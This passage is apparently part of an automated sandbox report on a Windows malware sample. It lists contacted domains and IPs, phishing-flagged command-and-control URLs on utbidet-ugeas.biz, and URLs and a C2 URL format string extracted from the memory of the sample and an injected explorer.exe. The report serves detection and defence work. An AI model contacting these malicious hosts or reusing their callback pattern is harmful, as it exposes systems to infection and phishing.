                                                                		64.70.19.203
                                                                		truefalse
                                                                  		unknown
                                                                  oigusewa.vg
                                                                  		88.198.29.97
                                                                  		truefalse
                                                                    		unknown
                                                                    zuvblymqiom.vg
                                                                    		88.198.29.97
                                                                    		truefalse
                                                                      		unknown
                                                                      skkawq.ph
                                                                      		45.79.222.138
                                                                      		truefalse
                                                                        		unknown
                                                                        gceocrmsm.ph
                                                                        		45.79.222.138
                                                                        		truefalse
                                                                          		unknown
                                                                          kwdscx.ws
                                                                          		64.70.19.203
                                                                          		truefalse
                                                                            		unknown
                                                                            wlopqesa.ws
                                                                            		64.70.19.203
                                                                            		truefalse
                                                                              		unknown
                                                                              tsmmqmmwg.ph
                                                                              		45.79.222.138
                                                                              		truefalse
                                                                                		unknown
                                                                                dcqir.vg
                                                                                		88.198.29.97
                                                                                		truefalse
                                                                                  		unknown
                                                                                  vmklwkrpmmi.vg
                                                                                  		88.198.29.97
                                                                                  		truefalse
                                                                                    		unknown
                                                                                    gcqiwuurhamq.ws
                                                                                    		64.70.19.203
                                                                                    		truefalse
                                                                                      		unknown
                                                                                      quoxyyhgwkw.vg
                                                                                      		88.198.29.97
                                                                                      		truefalse
                                                                                        		unknown
                                                                                        czcceggoa.ph
                                                                                        		45.79.222.138
                                                                                        		truefalse
                                                                                          		unknown
                                                                                          cefal.ph
                                                                                          		45.79.222.138
                                                                                          		truefalse
                                                                                            		unknown
                                                                                            umwkoadmhbrsv.ph
                                                                                            		45.79.222.138
                                                                                            		truefalse
                                                                                              		unknown
                                                                                              cbgokbq.vg
                                                                                              		88.198.29.97
                                                                                              		truefalse
                                                                                                		unknown
                                                                                                iware.ph
                                                                                                		45.79.222.138
                                                                                                		truefalse
                                                                                                  		unknown
                                                                                                  vcmiwoi.ws
                                                                                                  		64.70.19.203
                                                                                                  		truefalse
                                                                                                    		unknown
                                                                                                    yklznhasrec.ws
                                                                                                    		64.70.19.203
                                                                                                    		truefalse
                                                                                                      		unknown
                                                                                                      esdryukcayyoq.vg
                                                                                                      		88.198.29.97
                                                                                                      		truefalse
                                                                                                        		unknown
                                                                                                        wrzeolo.vg
                                                                                                        		88.198.29.97
                                                                                                        		truefalse
                                                                                                          		unknown
                                                                                                          kkrsmqksico.ws
                                                                                                          		64.70.19.203
                                                                                                          		truefalse
                                                                                                            		unknown
                                                                                                            orhwyostw.ph
                                                                                                            		45.79.222.138
                                                                                                            		truefalse
                                                                                                              		unknown
                                                                                                              yamijoovw.ws
                                                                                                              		64.70.19.203
                                                                                                              		truefalse
                                                                                                                		unknown
                                                                                                                wrrfiqelyzq.ws
                                                                                                                		64.70.19.203
                                                                                                                		truefalse
                                                                                                                  		unknown
                                                                                                                  byamehgekaeek.ws
                                                                                                                  		64.70.19.203
                                                                                                                  		truefalse
                                                                                                                    		unknown
                                                                                                                    garuyix.ph
                                                                                                                    		45.79.222.138
                                                                                                                    		truefalse
                                                                                                                      		unknown
                                                                                                                      zhvaaoijau.ws
                                                                                                                      		64.70.19.203
                                                                                                                      		truefalse
                                                                                                                        		unknown
                                                                                                                        gwzyu.ph
                                                                                                                        		45.79.222.138
                                                                                                                        		truefalse
                                                                                                                          		unknown
                                                                                                                          sbpgpqw.vg
                                                                                                                          		88.198.29.97
                                                                                                                          		truefalse
                                                                                                                            		unknown
                                                                                                                            owwvasibxygwtk.vg
                                                                                                                            		88.198.29.97
                                                                                                                            		truefalse
                                                                                                                              		unknown
                                                                                                                              rgqgidaugywcg.ph
                                                                                                                              		45.79.222.138
                                                                                                                              		truefalse
                                                                                                                                		unknown
                                                                                                                                lmmeeoyzyn.ws
                                                                                                                                		64.70.19.203
                                                                                                                                		truefalse
                                                                                                                                  		unknown
                                                                                                                                  jwgkbq.ph
                                                                                                                                  		45.79.222.138
                                                                                                                                  		truefalse
                                                                                                                                    		unknown
                                                                                                                                    fyuciecxgldyb.ws
                                                                                                                                    		64.70.19.203
                                                                                                                                    		truefalse
                                                                                                                                      		unknown
                                                                                                                                      yiodscs.ph
                                                                                                                                      		45.79.222.138
                                                                                                                                      		truefalse
                                                                                                                                        		unknown
                                                                                                                                        btnmut.ph
                                                                                                                                        		45.79.222.138
                                                                                                                                        		truetrue
                                                                                                                                          		unknown
                                                                                                                                          qsmnhmikgb.ws
                                                                                                                                          		64.70.19.203
                                                                                                                                          		truefalse
                                                                                                                                            		unknown
                                                                                                                                            wiwip.ph
                                                                                                                                            		45.79.222.138
                                                                                                                                            		truefalse
                                                                                                                                              		unknown
                                                                                                                                              wkgxyjabnhynde.vg
                                                                                                                                              		88.198.29.97
                                                                                                                                              		truefalse
                                                                                                                                                		unknown
                                                                                                                                                iefcm.cm
                                                                                                                                                		unknown
                                                                                                                                                		unknowntrue
                                                                                                                                                  		unknown
                                                                                                                                                  exmqudoi.cm
                                                                                                                                                  		unknown
                                                                                                                                                  		unknowntrue
                                                                                                                                                    		unknown
                                                                                                                                                    nukeecapkuanq.cg
                                                                                                                                                    		unknown
                                                                                                                                                    		unknowntrue
                                                                                                                                                      		unknown
                                                                                                                                                      zaspgiv.tk
                                                                                                                                                      		unknown
                                                                                                                                                      		unknowntrue
                                                                                                                                                        		unknown
                                                                                                                                                        menrzwzda.kr
                                                                                                                                                        		unknown
                                                                                                                                                        		unknowntrue
                                                                                                                                                          		unknown
                                                                                                                                                          mcesyrpjcoxcu.tk
                                                                                                                                                          		unknown
                                                                                                                                                          		unknowntrue
                                                                                                                                                            		unknown
                                                                                                                                                            ecumwls.mp
                                                                                                                                                            		unknown
                                                                                                                                                            		unknowntrue
                                                                                                                                                              		unknown
                                                                                                                                                              jwimhacdt.cm
                                                                                                                                                              		unknown
                                                                                                                                                              		unknowntrue
                                                                                                                                                                		unknown
                                                                                                                                                                oymyeynqyqewcs.mp
                                                                                                                                                                		unknown
                                                                                                                                                                		unknowntrue
                                                                                                                                                                  		unknown
                                                                                                                                                                  qhncbseaikqo.rw
                                                                                                                                                                  		unknown
                                                                                                                                                                  		unknowntrue
                                                                                                                                                                    		unknown
                                                                                                                                                                    ulwbq.cm
                                                                                                                                                                    		unknown
                                                                                                                                                                    		unknowntrue
                                                                                                                                                                      		unknown
                                                                                                                                                                      eqcdijeomajywh.rw
                                                                                                                                                                      		unknown
                                                                                                                                                                      		unknowntrue
                                                                                                                                                                        		unknown
                                                                                                                                                                        imctsikhqfmox.st
                                                                                                                                                                        		unknown
                                                                                                                                                                        		unknowntrue
                                                                                                                                                                          		unknown
                                                                                                                                                                          mokurs.rw
                                                                                                                                                                          		unknown
                                                                                                                                                                          		unknowntrue
                                                                                                                                                                            		unknown
                                                                                                                                                                            okocqpi.tk
                                                                                                                                                                            		unknown
                                                                                                                                                                            		unknowntrue
                                                                                                                                                                              		unknown
                                                                                                                                                                              eymkhoeguh.cm
                                                                                                                                                                              		unknown
                                                                                                                                                                              		unknowntrue
                                                                                                                                                                                		unknown
                                                                                                                                                                                ssgum.cg
                                                                                                                                                                                		unknown
                                                                                                                                                                                		unknowntrue
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  bgneigegyqofu.tk
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  		unknowntrue
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    uwkmq.kr
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    		unknowntrue
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      elymkl.rw
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      		unknowntrue
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        yiqqmjekm.tk
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        		unknowntrue
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          rmydkqgvcvhez.kr
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          		unknowntrue
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            numuqgoyj.nu
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            		unknowntrue
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              kuchksikknk.cg
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              		unknowntrue
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                uryaqqyx.cg
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                		unknowntrue
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  owpuc.cg
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  		unknowntrue
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    kikcvucesim.cm
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    		unknowntrue
                                                                                                                                                                                                      		unknown

                                                                                                                                                                                                      Contacted URLs

                                                                                                                                                                                                      NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?025085CC3A5785CC3A6285E43A508542E9C4BD646051850C925286FA1462ABF50860B5E23Atrue
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?0259BA88095EBA88096BBAA00959BA06DACD82205358BA48A15BB9BE276B94B13B698AA609true
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?029C5E69069B5E6906AE5E41069C5EE7D50866C15C9D5EA9AE9E5D5F28AE705034AC6E4706true
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?02A8ABCE52AFABCE529AABE652A8AB40813C936608A9AB0EFAAAA8F87C9A85F760989BE052true
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?028FF41BD188F41BD1BDF433D18FF495021BCCB38B8EF4DB798DF72DFFBDDA22E3BFC435D1true
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?0259AAD5925EAAD5926BAAFD9259AA5B41CD927DC858AA153A5BA9E3BC6B84ECA0699AFB92true
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?02D0E53B31D7E53B31E2E51331D0E5B5E244DD936BD1E5FB99D2E60D1FE2CB0203E0D51531true
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?025868AC8A5F68AC8A6A68848A58682259CC5004D059686C225A6B9AA46A4695B86858828Atrue
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?025434EAA65334EAA66634C2A654346475C00C42FC55342A0E5637DC88661AD3946404C4A6true
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?027812AD6B7F12AD6B4A12856B781223B8EC2A053179126DC37A119B454A3C94594822836Bfalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?028C8677478B867747BE865F478C86F99418BEDF1D8D86B7EF8E854169BEA84E75BCB65947false
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?022E17715D2917715D1C17595D2E17FF8EBA2FD9072F17B1F52C1447731C39486F1E275F5Dfalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?02AA0963E6AD0963E698094BE6AA09ED353E31CBBCAB09A34EA80A55C898275AD49A394DE6false
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?0224E513A724E513A716E53FA724E59D74B0DDBBFD25E5D30F26E6258916CB2A9514D53DA7false
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?029975A1079E75A107AB75890799752FD40D4D095D987561AF9B769729AB5B9835A9458F07true
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?021685246B1185246B24850C6B1685AAB882BD8C311785E4C31486124524AB1D5926B50A6Bfalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?02E9217EECEE217EECDB2156ECE921F03F7D19D6B6E821BE44EB2248C2DB0F47DED91150ECfalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?02B2F2472FB5F2472F80F26F2FB2F2C9FC26CAEF75B3F28787B0F1710180DC7E1D82C2692Ffalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?023421E6213421E6210621CA21342168F2A0194E7B352126893622D00F060FDF130411C821true
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?0244C4EA6D43C4EA6D76C4C26D44C464BED0FC423745C42AC546C7DC4376EAD35F74F4C46Dfalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?02DE65FDB3D965FDB3EC65D5B3DE6573604A5D55E9DF653D1BDC66CB9DEC4BC481EE55D3B3false
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?02607BE3D5677BE3D5527BCBD5607B6D06F4434B8F617B237D6278D5FB5255DAE7504BCDD5false
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?02146C369F136C369F266C1E9F146CB84C80549EC5156CF637166F00B126420FAD245C189Ffalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?025ACD535A5DCD535A68CD7B5A5ACDDD89CEF5FB005BCD93F258CE657468E36A686AFD7D5Afalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?025C90F0795C90F0796E90DC795C907EAAC8A858235D9030D15E93C6576EBEC94B6CA0DE79false
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?0228E1FBA12FE1FBA11AE1D3A128E17572BCD953FB29E13B092AE2CD8F1ACFC29318D1D5A1true
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?027E8E5D79798E5D794C8E75797E8ED3AAEAB6F5237F8E9DD17C8D6B574CA0644B4EBE7379false
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?023F07D6873807D6870D07FE873F075854AB3F7EDD3E07162F3D04E0A90D29EFB50F37F887false
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?0238A005623FA005620AA02D6238A08BB1AC98AD3839A0C5CA3AA3334C0A8E3C5008902B62false
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?02C4799EC2C3799EC2F679B6C2C479101150413698C5795E6AC67AA8ECF657A7F0F449B0C2false
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?02807A0D42877A0D42B27A2542807A83911442A518817ACDEA82793B6CB2543470B04A2342false
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?02263F721B213F721B143F5A1B263FFCC8B207DA41273FB2B3243C443514114B29160F5C1Bfalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?025D7412245A7412246F743A245D749CF7C94CBA7E5C74D28C5F77240A6F5A2B166D443C24false
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?02C3651025C4651025F1653825C3659EF6575DB87FC265D08DC166260BF14B2917F3553E25true
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?0298EF80DD9FEF80DDAAEFA8DD98EF0E0E0CD7288799EF40759AECB6F3AAC1B9EFA8DFAEDDfalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?027931B6B47E31B6B44B319EB479313867ED091EEE7831761C7B32809A4B1F8F86490198B4false
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown

                                                                                                                                                                                                      URLs from Memory and Binaries

                                                                                                                                                                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?024859D5D44F59D5D47A59FDD448595B07DC617D8E4959157C4A5AE3FA7A77ECE67869Fedsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2952422316.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2963937281.00000000007D0000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://ovonq.tk/edsuvoov-usum.exe, 00000001.00000003.2387143915.00000000007E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?028FF41BD188F41BD1BDF433D18FF495021BCCB38B8EF4DB798DF72DFFBDDA22E3BFC43edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmptrue
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?022257A5E92557A5E910578DE922572B3AB66F0DB323576541205493C710799CDB12678edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2457792216.00000000007C7000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://pwoawmujdqwzs.mp/edsuvoov-usum.exe, 00000001.00000003.2004705819.00000000007C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?029975A1079E75A107AB75890799752FD40D4D095D987561AF9B769729AB5B9835A9458edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2578341460.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2963937281.00000000007D0000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?023421E6213421E6210621CA21342168F2A0194E7B352126893622D00F060FDF130411Cedsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmptrue
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://ylmed.cm/edsuvoov-usum.exe, 00000001.00000003.3605804760.0000000000782000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?0228E1FBA12FE1FBA11AE1D3A128E17572BCD953FB29E13B092AE2CD8F1ACFC29318D1Dedsuvoov-usum.exe, 00000001.00000003.2212630872.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmptrue
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://cgengcwnm.kr/Uyedsuvoov-usum.exe, 00000001.00000002.3817754289.000000000074E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?02C3651025C4651025F1653825C3659EF6575DB87FC265D08DC166260BF14B2917F3553edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmptrue
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?0298EF80DD9FEF80DDAAEFA8DD98EF0E0E0CD7288799EF40759AECB6F3AAC1B9EFA8DFAedsuvoov-usum.exe, 00000001.00000003.2486210351.00000000007CC000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2486234033.00000000007D3000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2482148761.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2486285890.00000000007D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://oukpcbtqgqwoa.nu/mLedsuvoov-usum.exe, 00000001.00000003.3591514771.0000000000781000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3605804760.0000000000782000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://sgfpiiwog.tk/;0edsuvoov-usum.exe, 00000001.00000003.3648952417.0000000000782000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?02146C369F136C369F266C1E9F146CB84C80549EC5156CF637166F00B126420FAD245C1edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://ww99.utbidet-ugeas.biz/d/N?028C86edsuvoov-usum.exe, 00000001.00000003.2775675156.00000000007D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://oukpcbtqgqwoa.nu/~edsuvoov-usum.exe, 00000001.00000003.3215091027.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3214993609.00000000007C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://%s.biz/d/N?http://%s.biz/d/G?http://%s/d/rpt?%smodemisdn%u.%u.%u.%s5SGOAKv7AR.exe, 00000000.00000002.1354440542.0000000000407000.00000004.00000001.01000000.00000003.sdmp, edsuvoov-usum.exe, 00000001.00000002.3817514137.0000000000407000.00000004.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?02F85E4FC9FF5E4FC9CA5E67C9F85EC11A6C66E793F95E8F61FA5D79E7CA7076FBC86E6edsuvoov-usum.exe, 00000001.00000003.2650399591.00000000007D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?027931B6B47E31B6B44B319EB479313867ED091EEE7831761C7B32809A4B1F8F8649019edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://ww99.utbidet-ugeas.biz/d/N?0263D5344564D5344551D51C4563D5BA96F7ED9C1F62D5F4ED61D6026B51FB0D77edsuvoov-usum.exe, 00000001.00000003.1633868801.00000000007CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      https://android.notify.windows.com/iOSdexplorer.exe, 00000005.00000003.2212309611.000000000BF73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3830834393.000000000BFB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2214265649.000000000BFB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3079859452.000000000BF73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1369884699.000000000BF72000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://utbidet-ugeas.biz/d/N?0235A3ED6032A3ED6007A3C56035A363B3A19B453A34A32DC837A0DB4E078DD4520593Cedsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://qdukhasgmus.tk/edsuvoov-usum.exe, 00000001.00000002.3817754289.000000000074E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://owzuhlkauoavrg.rw/pedsuvoov-usum.exe, 00000001.00000003.2013476768.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2124424664.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2111789785.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2033834278.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2111460280.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2051722342.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2004705819.00000000007C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000005.00000003.2211575398.0000000008D2F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1360878216.0000000008D2F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3827739979.0000000008D47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2211822398.0000000008D44000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3078509367.0000000008D47000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://pdrwqa.mp/:edsuvoov-usum.exe, 00000001.00000003.3624526051.0000000000782000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3629814969.0000000000782000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      		unknown
